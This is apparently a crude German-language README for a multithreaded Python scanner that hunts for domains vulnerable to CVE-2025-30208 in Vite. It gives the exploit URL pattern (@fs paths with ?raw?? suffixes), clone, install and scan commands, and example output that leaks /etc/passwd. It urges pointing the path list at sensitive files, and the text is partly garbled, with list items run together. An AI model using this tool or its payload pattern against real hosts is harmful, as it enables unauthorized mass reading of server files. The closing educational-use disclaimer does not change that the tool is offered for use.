
CVE-2025-30208 ViteVulnScanner
Yo, das ist ein cooles Multi-Thread-Python-Skript von keklick1337, um nach Domains zu suchen, die anfällig für CVE-2025-30208 in Vite sind. Im Grunde prüft es, ob du über den @fs-Endpunkt mit ?raw?? oder ?import&raw?? zufällige Dateien abgreifen kannst – denk an /etc/passwd-Leaks und anderen geilen Scheiß. Es hat eine clevere False-Positive-Filterung, damit du keine Zeit mit Mist verschwendest, plus Optionen, um die Ausgabe anzupassen.
<head> und <body> weg, es sei denn, sie riechen legitim.sourcemappingurl oder export default, um das Gute zu bestätigen.results_good.txt, results_maybe_good.txt, results_bad.txt).-u hinzu, wenn du darauf stehst.requestsurllib3git clone https://github.com/keklick1337/CVE-2025-30208-ViteVulnScanner.git
cd CVE-2025-30208-ViteVulnScanner
pip install requests urllib3
path_list.txt: Pfade zum Prüfen, einer pro Zeile (z.B. /etc/passwd).domains.txt: Domains zum Abklappern, eine pro Zeile (z.B. example.com).Starte es so:
python3 CVE-2025-30208.py <domains_file> [options]
<domains_file>: Deine Domainliste (keine Datei, kein Scan, klar).-t, --threads: Wie viele Threads du loslassen willst (Standard: 10).-p, --protocol: Erzwinge http oder https, oder lass es weg für beide.-u, --urls: Schmeiße anfällige URLs in die Ausgabe.-o, --output: Basisname für Dateien (Standard: results).-f, --format: txt für geteilte Dateien oder jsonl für eine große Datei (Standard: txt).python3 CVE-2025-30208.py domains.txt
python3 CVE-2025-30208.py domains.txt -t 20 -u -f jsonl
python3 CVE-2025-30208.py domains.txt -t 5 -p https
-f txt)results_good.txt: Scheiß, der definitiv kaputt ist (hat sourcemappingurl oder export default).results_maybe_good.txt: Könnte anfällig sein, aber kein rauchender Colt.results_bad.txt: Sauber, keine Sorgen.-u werden URLs mit einem Tabulator (\t) angehängt.results_good.txt mit -u:example.com https://example.com/@fs/etc/passwd?raw??
-f jsonl)results_good.jsonl, results_maybe_good.jsonl, results_bad.jsonl.domain: Was du gescannt hast.status: VULNERABLE, MAYBE VULNERABLE oder BAD.url (falls -u): Wo es kaputt ist.response: Was der Server ausgespuckt hat.results_good.jsonl:{"domain": "example.com", "status": "VULNERABLE", "url": "https://example.com/@fs/etc/passwd?raw??", "response": "root:x:0:0:root:/root:/bin/bash"}
/1e4c911a3fd2244596863ddbfa6f3600/7970621079b41658dcd6c205640b3602/fake).<head> und <body> gibt, ist es ein Nein – der Server ist nur ein Arsch.path_list.txt mit @fs/<path>?raw?? und ?import&raw??.<head> und <body>? Überspringe den Scheiß.sourcemappingurl oder export default? Bumm, GOOD.MAYBE_GOOD.urllib3.disable_warnings()), also meckert es nicht über Zertifikate. Sei vorsichtig da draußen.path_list.txt für deine Ziele an – sensible Dateien sind der wahre Hammer.Hört zu: dieser Scheiß ist nur für Bildungszwecke, Bruder. Ich bin nicht verantwortlich, wenn du etwas versaust, erwischt wirst oder jemanden damit verärgerst. Benutze es, um zu lernen, nicht um ein Arschloch zu sein. Alle Risiken liegen bei dir, nahuy – ich bin nur hier, um Code abzuliefern.
Hast du Ideen? Einen Fehler gefunden? Melde dich mit Issues oder Pull Requests. Mehr Möglichkeiten, False Positives zu killen oder coole Features? Lass uns dieses Biest noch krasser machen.
BAD